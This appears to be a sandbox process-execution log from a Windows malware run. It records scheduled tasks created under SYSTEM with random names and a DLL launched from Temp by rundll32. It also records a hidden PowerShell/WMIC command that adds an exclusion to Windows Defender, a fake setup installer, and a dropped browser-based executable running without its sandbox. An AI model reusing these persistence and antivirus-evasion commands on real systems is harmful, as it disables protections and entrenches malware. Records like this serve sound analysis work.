C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\xlHRzsY.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\USRawYq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\usrdqkC.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\uaMQFLy.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\jPLBMmW.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 02:06:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll\",#1 /cididxj 757674" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MRTHivZIQsRdEanwm"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5828 -ip 5828
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll",#1 /cididxj 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll",#1 /cididxj 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1168
C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe
"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe" /S YB
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1692
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe
"C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"
C:\Users\Admin\AppData\Local\Temp\is-60T68.tmp\setup_34Uv1hLE7B.tmp
"C:\Users\Admin\AppData\Local\Temp\is-60T68.tmp\setup_34Uv1hLE7B.tmp" /SL5="$C02A6,6120275,56832,C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe\" z0 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 1711397ec0a91dd980a7244b5bb3ba84
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1980 -ip 1980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 152
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2768 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2976 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2988 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2880 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3152 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4036 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4064 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3648 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3984 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3808 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3760 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4080 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4100 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4152 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4160 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4188 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
